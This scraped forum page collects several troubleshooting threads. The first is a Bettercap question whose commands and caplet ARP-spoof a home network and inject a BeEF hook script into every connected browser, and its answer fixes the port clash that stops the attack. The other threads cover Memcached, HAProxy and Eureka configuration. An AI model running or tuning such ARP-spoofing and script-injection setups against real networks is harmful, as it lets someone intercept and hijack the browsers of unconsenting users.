Bettercap: bind: address already in use - mitmproxy

Whatever port I try to use I keep getting the error:
listen tcp 0.0.0.0:PORT_NUMBER: bind: address already in use
Environment
I also installed this using Brew if you need to know that
Bettercap 2.11.1
Mac OS High-Sierra
golang 1.11.4
Command line code used:
sudo bettercap -eval "set net.probe off; set arp.spoof.targets 0.0.0.0" -caplet beef-active.cap
beef-active.cap:
set http.proxy.script beef-inject.js
set http.proxy.port 8011
set https.proxy.port 8011
http.proxy on
https.proxy on
sleep 1
arp.spoof on
Expected behavior:
I am trying to inject some js into the browser of each computer connected to my router. I except to see a message that the beef-inject was successfully injected
Actual behavior: What actually happened
Stops when it hits my IP address. Here is the output:
[13:26:41] [sys.log] [inf] http.proxy started on 0.0.0.0:8011 (sslstrip disabled)
[13:26:41] [sys.log] [inf] loading proxy certification authority TLS key from /var/root/.bettercap-ca.key.pem
[13:26:41] [sys.log] [inf] loading proxy certification authority TLS certificate from /var/root/.bettercap-ca.cert.pem
[13:26:41] [sys.log] [inf] Enabling forwarding.
[13:26:41] [sys.log] [inf] https.proxy started on 0.0.0.0:8011 (sslstrip disabled)
[13:26:41] [sys.log] [!!!] listen tcp 0.0.0.0:8011: bind: address already in use
edit:
Changing the ports for both to be different stopped the error however it is still not injecting anything into the browsers. All I keep getting in the console is:
ok so I changed that and I am no longer getting that error however, it is still not injecting any JS into the browsers. I just keep getting new and lost endpoints like so:
0.0.0.0/24 > 0.0.0.0 » [08:33:17] [endpoint.new] endpoint 0.0.0.0 detected as 04:18:d6:d0:69:e7 (Apple, Inc.).
0.0.0.0/24 > 0.0.0.0 » [08:33:23] [endpoint.lost] endpoint 0.0.0.0 (Apple, Inc.) lost.
.... Then it keeps ticking through the same messages, new > lost > new > lost
Any ideas?

set http.proxy.port 8011
set https.proxy.port 8011
Those ports are set to the same thing, which means they're both trying to listen on 8011 and are stomping on each other.
Change one of them to a different port and the error should go away.
Cheers!

Related

You should use a persistent object cache. Why does Memcached on Wordpress not work on a LAMP stack with multiple virtual hosts?

I have a LAMP stack with multiple virtual hosts. Memcached is not working in Wordpress, It used to untill I created more virtual hosts.
From WordPress I get:
You should use a persistent object cache
From W3 Total Cache, I get the following:
The following memcached servers are not responding or not running:
Database Cache: 127.0.0.1:11211.
Object Cache: 127.0.0.1:11211.
This message will automatically disappear once the issue is resolved.
My info.php here
lsof -i :11211
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
memcached 350432 memcache 22u IPv4 5140918 0t0 TCP localhost:11211 (LISTEN)
memcached 350432 memcache 23u IPv6 5140919 0t0 TCP ip6-localhost:11211 (LISTEN)
In /etc/memcached.conf I have set -l 127.0.0.1 and also l ::1 for ipv6.
-vv
Dec 23 20:24:46 a-c-d systemd-memcached-wrapper[369407]: authenticated() in cmd 0x01 is false
Dec 23 20:24:46 a-c-d systemd-memcached-wrapper[369407]: >24 Writing an error: Auth failure.
Dec 23 20:24:46 a-c-d systemd-memcached-wrapper[369407]: >24 Writing bin
var//log/apache2/error.log:
PHP message: [ERROR] WP_CACHE constant is not present in wp-config.php
PHP Warning: Trying to access array offset on value of type null in /var/www/html/example.com/public_html/wp-content/plugins/w3-total-cache/Util_Installed.php on line 145', referer: https://www.example.com/wp-adminplugin_status=all&paged=1&s
/plugins.php?
EDIT:
I can see here redis is enabled even though I have deleted it completely, this is weird.
Any help on how to resolve this would be really great, thanks!
I have tried everything I can think of. Logging as much as possible, researching the web. I exspect to get memcached to work again :)

Haproxy 1.6.2 not recognizing resolvers section

As a test, I have a local bind instance running:
>netstat -ant | grep LISTEN
tcp 0 0 10.72.186.23:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
...
>nslookup mysubdomain.example.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: mysubdomain.example.com
Address: nn.nn.nn.251
Name: mysubdomain.example.com
Address: nn.nn.nn.249
Name: mysubdomain.example.com
Address: nn.nn.nn.201
Name: mysubdomain.example.com
Address: nn.nn.nn.138
I'm running haproxy 1.6.2 on the same host, with a resolvers section:
resolvers dns
nameserver dns1 127.0.0.1:53
nameserver dns2 10.72.186.23:53
hold valid 10s
It doesn't reject the resolvers section, but doesn't seem to be using it, either. It doesn't show in the stats page, and attempting to add this service command:
server mysubdomain-dev mysubdomain.example.com
causes this error:
>service haproxy restart
* Restarting haproxy haproxy
[ALERT] 322/171813 (10166) : parsing [/etc/haproxy/haproxy.cfg:77] : 'server mysubdomain-dev' : invalid address: 'mysubdomain.example.com' in 'mysubdomain.example.com'
[ALERT] 322/165300 (29751) : Error(s) found in configuration file : /etc/haproxy/haproxy.cfg
[ALERT] 322/165300 (29751) : Fatal errors found in configuration.
The haproxy doc https://cbonte.github.io/haproxy-dconv/configuration-1.6.html indicates this should work.
server <name> <address>[:[port]] [param*]
...
<address> is the IPv4 or IPv6 address of the server. Alternatively, a
resolvable hostname is supported, but this name will be resolved
during start-up. Address "0.0.0.0" or "*" has a special meaning.
Is there some other piece that needs to be added to the haproxy.cfg that activates the resolvers section?
When HAProxy first starts, it attempts to resolve the hostnames of any servers in all the backends to fill the server structures. During this first startup phase, HAProxy uses the OS resolver, i.e. generally the servers defined in your /etc/resolv.conf file.
Only later, when the server's IP addresses are updated during checks, HAProxy uses its internal resolver configuration and its internal DNS resolver.
From your error description, it now seems as if your host itself can not resolve the mysubdomain.example.com hostname. HAProxy will only be able to start if it can resolve the hostnames without an explicit named nameserver. This can be verified with e.g.
dig mysubdomain.example.com
might be you are not specifying the resolvers to use for that server
server mysubdomain-dev mysubdomain.example.com ->
server mysubdomain-dev mysubdomain.example.com resolvers dns

haproxy cofiguration getting error

service haproxy start
* Starting haproxy haproxy
[ALERT] 299/163851 (6382) : Starting proxy 50.112.164.38:80: cannot bind socket
[ALERT] 299/163851 (6382) : Starting proxy 50.112.164.38:443: cannot bind socket
The issue is that there is no listen port in the configuration. use "listen" or "bind" and then restart it. It should work. If you still having trouble show the code over here and I will look into it
Safi

haproxy sni ssl_fc_has_sni always 0

I am trying to create an SNI based frontend/backend setup in HAProxy. It seems that ssl_fc_has_sni is always evaluating to 0 in my log and I haven't been able to figure out why.
This is a simplified version of the config I've been testing with:
global
user haproxy
group haproxy
daemon
log /dev/log local0
defaults
timeout connect 5s
timeout client 30s
timeout server 30s
timeout tunnel 1h
log-format frontend:%f\ %b/%s\ client_ip:%Ci\ client_port:%Cp\ SSL_version:%sslv\ SSL_cypher:%sslc\ SNI:%[ssl_fc_has_sni]\ %ts
frontend public_ssl
bind :443
log global
tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
use_backend be_sni if { ssl_fc_has_sni }
default_backend be_no_sni
backend be_sni
server fe_sni 127.0.0.1:10444 weight 1 send-proxy
frontend fe_sni
#terminate with a cert that matches the sni host
bind 127.0.0.1:10444 ssl crt /mycertdir/certs accept-proxy no-sslv3
default_backend be_default
frontend fe_no_sni
#terminate with a generic cert
bind 127.0.0.1:10443 ssl crt /myothercertdir/default_pub_keys.pem accept-proxy no-sslv3
default_backend be_default
# backend for when sni does not exist, or ssl term needs to happen on the edge
backend be_no_sni
server fe_no_sni 127.0.0.1:10443 weight 1 send-proxy
backend be_default
mode http
option forwardfor
option http-pretend-keepalive
server the_backend 127.0.0.1:8080
Other items of note:
haproxy -vv shows OpenSSL library supports SNI : yes
I am running haproxy version 1.5.9 on fedora 20 through vagrant
the log always shows SNI:0 haproxy[17807]: frontend:public_ssl be_no_sni/fe_no_sni client_ip:<ip> client_port:42285 SSL_version:- SSL_cypher:- SNI:0 --
I'm testing with openssl s_client -servername www.example.com -connect <ip>:443.
I feel like I'm missing something obvious since there is no ssl version, cypher, or sni.
Looks like ssl_fc_has_sni is meant to be used post termination. Checking for the existence of the SNI host can be accomplished with:
frontend public_ssl
bind :443
mode tcp
tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
use_backend be_sni if { req.ssl_sni -m found }
default_backend be_no_sni

Error when getting the Info from Config Server

I am configuring an Eureka client app, but always the registered port result in 80.
The server config is obtained from Eureka with auto-discovery enabled, when auto-discovery is disabled the port is registered correctly.
The port of the app is assigned only from the command line (--server.port=8080) and deleted in all other properties files (app.yaml, boostrap.yaml and in the config server git repo)
I have notice that in this code:
EurekaClientConfiguration.java
if (port != 0 && instanceConfig.getNonSecurePort() == 0) {
instanceConfig.setNonSecurePort(port);
}
The instanceConfig.getNonSecurePort() never is 0, due to this, the nonSecurePort property is never changed.
I have to register the port property in some other place?
Edited to add some detail:
I mean that my bootstrap.yml has the following lines:
cloud:config:discovery:enabled: true
The yml config is in a github repository and doesn’t have the port assigned
The app is running in the port 8082 with the app param --server.port=8082 But when it is registered in Eureka the port is always 80 instead of 8082
<port enabled="true">8082</port>
<securePort enabled="false">443</securePort>
This cause every based ribbon invocation doesn’t get the correct URL.
I notice that the port is setting correctly in this handler event after the init
EurekaClientConfiguration.java:
public void onApplicationEvent(EmbeddedServletContainerInitializedEvent event) {
...
EurekaClientConfiguration.this.port = event.getEmbeddedServletContainer().getPort();
But the flag "running" is active now and doesn't have any effect
Thanks a lot for your help